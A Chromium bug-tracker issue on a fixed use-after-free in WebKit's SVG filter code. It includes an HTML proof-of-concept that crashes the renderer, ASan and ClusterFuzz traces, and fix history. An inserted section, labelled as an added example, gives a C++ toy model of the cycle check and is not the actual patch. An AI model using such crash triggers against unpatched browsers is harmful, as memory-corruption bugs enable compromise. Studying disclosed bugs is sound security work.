Issue 143761

Issue metadata

Status: Fixed
Owner:
Closed: Dec 2012
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security



Heap-use-after-free in WebCore::GraphicsContext::restore

Reported by miau...@gmail.com, Aug 20 2012

Issue description



VULNERABILITY DETAILS
use-after-free in WebCore::GraphicsContext::restore

VERSION
Chrome Version: stable, beta, dev
Operating System: linux 64bit precise

REPRODUCTION CASE
<html>
  <head>
    <style>
    </style>
    <script>
      // Build an <svg> root, a <filter> inside it, and an <feImage> primitive with no source yet
      onload = function() {
        el0=document.createElementNS('http://www.w3.org/2000/svg', 'svg')
        el0.setAttribute('id','el0')
        document.body.appendChild(el0)
        el1=document.createElementNS('http://www.w3.org/2000/svg', 'filter')
        el1.setAttribute('id','el1')
        el0.appendChild(el1)
        el2=document.createElementNS('http://www.w3.org/2000/svg', 'feImage')
        el1.appendChild(el2)
        // Force layout so the filter data is created
        document.body.offsetTop
        // Apply the filter to the root, then point feImage back at that same root:
        // painting el0 now re-enters the filter that is in the middle of painting it
        el0.setAttribute('filter', 'url(#el1)')
        el2.setAttributeNS('http://www.w3.org/1999/xlink', 'xlink:href', '#el0')
      }
    </script>
  </head>
  <body>
  </body>
</html>


FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: renderer + asan
Crash State: 

==12607== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffebb720ec at pc 0x55555a508f2e bp 0x7ffffffeefc0 sp 0x7ffffffeefb8
READ of size 1 at 0x7fffebb720ec thread T0
    #0 0x55555a508f2d in WebCore::GraphicsContext::restore() ???:0
    #1 0x55555c30d44c in WebCore::RenderSVGRoot::paintReplaced(WebCore::PaintInfo&, WebCore::FractionalLayoutPoint const&) ???:0
    #2 0x55555b7edc70 in WebCore::RenderReplaced::paint(WebCore::PaintInfo&, WebCore::FractionalLayoutPoint const&) ???:0

0x7fffebb720ec is located 108 bytes inside of 144-byte region [0x7fffebb72080,0x7fffebb72110)
freed by thread T0 here:
    #0 0x55555f152d10 in __interceptor_free ??:0
    #1 0x55555a57a0a5 in WebCore::ImageBuffer::~ImageBuffer() ???:0
    #2 0x55555a63aa51 in WebCore::FilterEffect::~FilterEffect() ???:0
    #3 0x55555c5c266d in WebCore::FEImage::~FEImage() ???:0

Attachments:
108144-2.html (702 bytes)
stable-108144-2.txt (17.3 KB)
beta-108144-2.txt (17.3 KB)
108144-2.txt (18.7 KB)
Cc: pdr@chromium.org fmalita@chromium.org schenney@chromium.org
Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit SecSeverity-High WebKit-SVG OS-All SecImpacts-Stable SecImpacts-Beta
Status: Available
CF report coming - https://cluster-fuzz.appspot.com/testcase?key=96828636
Summary: Heap-use-after-free in WebCore::GraphicsContext::restore
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=96828636

Uploader: aarya@google.com

Crash Type: Heap-use-after-free READ 1
Crash Address: 0x7f5ebc6932ec
Crash State:
  - crash stack -
  WebCore::GraphicsContext::restore
  WebCore::RenderSVGRoot::paintReplaced
  - free stack -
  WebCore::ImageBuffer::~ImageBuffer
  WebCore::FilterEffect::~FilterEffect
  
Regressed: https://cluster-fuzz.appspot.com/revisions?range=125849:125919

Minimized Testcase (0.60 Kb):
Download: https://cluster-fuzz.appspot.com/download/AMIfv94TyPA2MSYvf6Wb1Q7pSqFDS0fDObWdbPr7_2rup52CbKZoC0maCGAvsO25W0Go5mSwqSoW77g6AcKQsPhQ1yrwYG7en5l_WG8ypyfERx1gsO5XhYvpDTZuGAsNSzQarIJqNytZE1wiKgtva2dxtnkGmp0EFt4N_6_XSg1fd_Bmlv6ioWY
<script>
      onload = function() {
        el0=document.createElementNS('http://www.w3.org/2000/svg', 'svg')
        el0.setAttribute('id','el0')
        document.body.appendChild(el0)
        el1=document.createElementNS('http://www.w3.org/2000/svg', 'filter')
        el1.setAttribute('id','el1')
        el0.appendChild(el1)
        el2=document.createElementNS('http://www.w3.org/2000/svg', 'feImage')
        el1.appendChild(el2)
        document.body.offsetTop
        el0.setAttribute('filter', 'url(#el1)')
        el2.setAttributeNS('http://www.w3.org/1999/xlink', 'xlink:href', '#el0')
      }
    </script>
Labels: Mstone-21
Labels: Security-CodeYellow
Owner: schenney@chromium.org
Status: Assigned
I'll take it.
Could you cc: me on the upstream bug?  I'm curious about the problem.
It's dead simple, although maybe not too simple to fix.

An SVG doc and filter and feImage filter effect are created, but the feImage has no src. Then layout is forced, which has the effect of creating filter data. In the final step, the src of the feImage is set to the root SVG, creating a circular dependency which causes the filter code to free the graphics context it is using while still using it.
It sounds like we either need to extend the cycle detection currently done by FilterEffect to traverse into SVG documents (which might be tricky if the documents were pending external resource loads), or just prohibit SVG documents as FEImage sources altogether (big hammer).
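The circular dependency described above, modeled as an added example. This is not WebKit code and not the upstream fix (the page does not say which approach changeset 131488 took); it is a toy reference graph with the three elements from the repro and a paint-dependency walk that follows filter="url(#id)" into the filter's feImage primitives and from an feImage to its xlink:href target, reporting the cycle el0 -> el1 -> el2 -> el0 before any filter data would be built. The "big hammer" option from the comment, refusing an feImage whose target is an SVG root regardless of whether a cycle exists, is the separate feImageTargetIsAllowed() check. Element, Document, findPaintCycle, safeToPaint, feImageTargetIsAllowed and the constructed repro() document are all assumptions of this example.

```cpp
// Added example, not WebKit code: a toy model of the SVG filter / feImage
// reference graph from the repro, with cycle detection over paint dependencies.
// Element, Document and every function name below are assumptions of this example.
#include <iostream>
#include <map>
#include <string>
#include <vector>

struct Element {
    std::string id;
    std::string tag;                     // "svg", "rect", "filter", "feImage", ...
    std::string filterRef;               // id named by filter="url(#id)", or ""
    std::string hrefRef;                 // feImage xlink:href target id, or ""
    std::vector<std::string> children;   // child element ids in document order
};

using Document = std::map<std::string, Element>;

// What painting `e` makes the renderer paint next. A <filter> is not rendered as
// content, so it is reached only through a filterRef; once reached it "paints"
// its primitives, and an feImage paints whatever its href points at.
static std::vector<std::string> paintDependencies(const Document& doc, const Element& e) {
    std::vector<std::string> deps;
    if (e.tag == "filter") {
        deps = e.children;
    } else if (e.tag == "feImage") {
        if (!e.hrefRef.empty()) deps.push_back(e.hrefRef);
    } else {
        for (const std::string& c : e.children) {
            auto it = doc.find(c);
            if (it != doc.end() && it->second.tag != "filter") deps.push_back(c);
        }
        if (!e.filterRef.empty()) deps.push_back(e.filterRef);
    }
    return deps;
}

enum class Mark { Unvisited, InProgress, Done };

// Depth-first walk; an edge back to an InProgress node is a cycle. On success
// `path` holds the walk from the root down to the repeated element.
static bool walk(const Document& doc, const std::string& id,
                 std::map<std::string, Mark>& marks, std::vector<std::string>& path) {
    auto it = doc.find(id);
    if (it == doc.end()) return false;   // dangling reference: nothing to paint
    Mark& m = marks[id];
    if (m == Mark::InProgress) { path.push_back(id); return true; }
    if (m == Mark::Done) return false;
    m = Mark::InProgress;
    path.push_back(id);
    for (const std::string& dep : paintDependencies(doc, it->second))
        if (walk(doc, dep, marks, path)) return true;
    path.pop_back();
    m = Mark::Done;
    return false;
}

// Returns the paint walk from `rootId` to the first element painted twice, or an
// empty vector when painting `rootId` never re-enters an element being painted.
std::vector<std::string> findPaintCycle(const Document& doc, const std::string& rootId) {
    std::map<std::string, Mark> marks;
    std::vector<std::string> path;
    if (!walk(doc, rootId, marks, path)) return {};
    return path;
}

// Option 1 from the discussion: run the cycle check before building filter data.
bool safeToPaint(const Document& doc, const std::string& rootId) {
    return findPaintCycle(doc, rootId).empty();
}

// Option 2 ("big hammer"): refuse any feImage whose target is an <svg> element,
// whether or not a cycle actually exists.
bool feImageTargetIsAllowed(const Document& doc, const std::string& feImageId) {
    auto fe = doc.find(feImageId);
    if (fe == doc.end() || fe->second.tag != "feImage") return false;  // not an feImage
    auto target = doc.find(fe->second.hrefRef);
    if (target == doc.end()) return true;   // nothing to paint, nothing to forbid
    return target->second.tag != "svg";
}

// The three elements built by the repro, as a constructed document.
Document repro() {
    Document doc;
    doc["el0"] = Element{"el0", "svg", "el1", "", {"el1"}};
    doc["el1"] = Element{"el1", "filter", "", "", {"el2"}};
    doc["el2"] = Element{"el2", "feImage", "", "el0", {}};
    return doc;
}

int main() {
    Document doc = repro();
    for (const std::string& id : findPaintCycle(doc, "el0")) std::cout << id << " -> ";
    std::cout << (safeToPaint(doc, "el0") ? "(no cycle)\n" : "cycle\n");
    return 0;
}
```

The walk deliberately treats a dangling href as harmless: an feImage that points at nothing paints nothing. The comment's caveat about pending external resource loads is the real-world complication this toy skips, since a target that has not loaded yet has no element to walk into and the check would have to be re-run once it arrives.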
Friendly ping. This bug is reaching a ripe old age. :)
I've spent a bunch of time wrapping my head around it. The problem is that the data needed is not in the places it's needed, so some rather significant refactoring is going to be required. It's the next bug on my agenda.
Labels: -Mstone-21 Mstone-22
Mass move from m21 to m22.
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: FixUnreleased
http://trac.webkit.org/changeset/131488
Comment 14 by ClusterFuzz, Oct 17 2012

ClusterFuzz has detected this issue as fixed in range 162270:162321.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=96828636

Uploader: aarya@google.com

Crash Type: Heap-use-after-free READ 1
Crash Address: 0x7f5ebc6932ec
Crash State:
  - crash stack -
  WebCore::GraphicsContext::restore
  WebCore::RenderSVGRoot::paintReplaced
  - free stack -
  WebCore::ImageBuffer::~ImageBuffer
  WebCore::FilterEffect::~FilterEffect
  
Regressed: https://cluster-fuzz.appspot.com/revisions?range=125849:125919
Fixed: https://cluster-fuzz.appspot.com/revisions?range=162270:162321

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv94TyPA2MSYvf6Wb1Q7pSqFDS0fDObWdbPr7_2rup52CbKZoC0maCGAvsO25W0Go5mSwqSoW77g6AcKQsPhQ1yrwYG7en5l_WG8ypyfERx1gsO5XhYvpDTZuGAsNSzQarIJqNytZE1wiKgtva2dxtnkGmp0EFt4N_6_XSg1fd_Bmlv6ioWY

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.
Labels: -Mstone-22 -Merge-Approved Mstone-23 Merge-Merged reward-topanel
M23: http://trac.webkit.org/changeset/132809

We almost forgot reward-topanel :)
Labels: -reward-topanel reward-1000 reward-unpaid
... but we won't forget to reward at the $1000 level!
Labels: -reward-unpaid
Status: Fixed
Comment 19 by bugdroid1@chromium.org, Mar 10 2013

Labels: -Type-Security -Area-WebKit -SecSeverity-High -WebKit-SVG -SecImpacts-Stable -SecImpacts-Beta -Mstone-23 Cr-Content Security-Impact-Stable Security-Impact-Beta Cr-Content-SVG M-23 Security-Severity-High Type-Bug-Security
Labels: -Restrict-View-SecurityNotify

Comment 21 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Severity-High Security_Severity-High

Comment 22 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Impact-Stable Security_Impact-Stable

Comment 23 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Impact-Beta Security_Impact-Beta

Comment 24 by bugdroid1@chromium.org, Apr 6 2013

Labels: -Cr-Content Cr-Blink

Comment 25 by bugdroid1@chromium.org, Apr 6 2013

Labels: -Cr-Content-SVG Cr-Blink-SVG

Comment 26 by sheriffbot@chromium.org, Jun 14 2016

Labels: -security_impact-beta

Comment 27 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 28 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic